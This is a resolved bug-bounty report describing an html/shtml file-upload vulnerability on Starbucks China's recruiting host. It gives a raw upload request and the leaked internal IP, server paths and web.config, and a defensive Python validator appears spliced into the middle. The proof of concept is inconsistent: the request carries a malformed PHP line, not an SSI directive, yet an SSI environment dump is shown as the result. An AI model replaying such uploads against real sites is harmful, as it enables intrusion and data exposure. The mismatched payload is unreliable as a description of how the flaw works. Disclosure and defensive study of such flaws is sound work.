China - ecjobsdc.starbucks.com.cn html/shtml file upload vulnerability
High
Vulnerability Details
### 1. Summary
During the test, I found that ecjobsdc.starbucks.com.cn has an upload vulnerability: you can upload html and shtml format files, so you can read the server's intranet IP, the physical path of the website application, and the website's web.config file.
### 2. Vulnerability scope
https://ecjobsdc.starbucks.com.cn
### 3. Proof of exploit
By modifying the file name suffix, html and shtml files can be uploaded to this address, which allows reading the server's intranet IP, the physical path of the website application, and the website's configuration file.
Proof of vulnerability
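The root cause is that the upload handler trusts the client-supplied suffix. Below is an added server-side check (my own example, not code from the affected application) that decides whether an upload may be stored: it normalises the name the way Windows/IIS would before looking at the extension, rejects anything IIS or a browser would render as active content (.shtml, .html, ...), confirms the body starts with the signature of the claimed type, and never reuses the client's basename. The allowlist and the magic-byte table are assumptions for a recruiting-site upload box.

```python
import os
import secrets
from typing import Optional

# Assumed allowlist for a recruiting-site upload box (CVs, photos); adjust to the application's needs.
ALLOWED_EXTENSIONS = {".pdf", ".doc", ".docx", ".jpg", ".jpeg", ".png"}

# Extensions IIS or a browser will execute or render as active content; rejected even if one
# of them is ever added to the allowlist by mistake (.shtml/.stm go through the SSI module).
ACTIVE_CONTENT = {".shtml", ".shtm", ".stm", ".html", ".htm", ".asp", ".aspx", ".ashx", ".asmx", ".svg"}

# Leading bytes expected for each allowed type (taken from the public format signatures).
MAGIC = {
    ".pdf": (b"%PDF-",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".docx": (b"PK\x03\x04",),       # OOXML is a ZIP container
    ".doc": (b"\xd0\xcf\x11\xe0",),  # legacy OLE compound file
}


def normalized_extension(client_filename: str) -> Optional[str]:
    """Return the lower-cased extension IIS would actually serve the file under, or None
    when the name contains something that should never come from a browser."""
    # Drop any directory part in either OS convention ("../x", "..\\x").
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    # NUL can truncate the name in lower-level APIs ("cv.shtml\0.pdf"); ":" is NTFS
    # alternate-data-stream syntax ("cv.shtml::$DATA"), which Windows strips on create.
    if "\x00" in name or ":" in name:
        return None
    # Windows removes trailing dots and spaces when creating the file, so
    # "x.shtml." is stored as "x.shtml"; normalise the same way before checking.
    name = name.rstrip(". ")
    ext = os.path.splitext(name)[1].lower()
    return ext or None


def validate_upload(client_filename: str, head: bytes) -> Optional[str]:
    """Return a server-chosen storage name for an acceptable upload, else None.
    `head` is the first bytes of the uploaded body, checked against the type's signature."""
    ext = normalized_extension(client_filename)
    if ext is None or ext in ACTIVE_CONTENT or ext not in ALLOWED_EXTENSIONS:
        return None
    if not any(head.startswith(sig) for sig in MAGIC[ext]):
        return None
    # Never reuse the client's basename; a random name keeps the on-disk path attacker-independent.
    return secrets.token_hex(16) + ext
```

Storing uploads outside the web root, or in a directory where handler mappings for .shtml/.aspx are removed, is the second layer that makes this check fail safe.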
```
POST /recruitjob/hxpublic_v6/hxinterface6.aspx?_hxcategory=hx_filebox_upload_file HTTP/1.1
Host: ecjobsdc.starbucks.com.cn
Connection: close
Content-Length: 234
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryevPInYidBxSvSd06
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryevPInYidBxSvSd06
Content-Disposition: form-data; name="hxwebfileboxcontrol_upload_file_inputbox"; filename="xxx.shtml"
Content-Type: text/html
<?php echo 1111;>
------WebKitFormBoundaryevPInYidBxSvSd06--
```
Successfully read the website's REMOTE_ADDR, PATH_INFO, physical document path and web.config file.
```
DOCUMENT_NAMED:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
SERVER_SOFTWARE :Microsoft-IIS/8.5
SERVER_NAME :ecjobsdc.starbucks.com.cn
SERVER_PORT :80
REMOTE_ADDR:10.92.29.50
REMOTE_HOST:10.92.29.50
D:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
PATH_INFO:/recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
/recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<httpRedirect enabled="false" destination="https://ecjobs.starbucks.net" exactDestination="false" />
</system.webServer>
</configuration>
```
{F349302}
{F349303}
## Impact
Phishing attack, remote file reading
Report Stats
- Report ID: 412481
- State: Closed
- Substate: resolved
- Upvotes: 45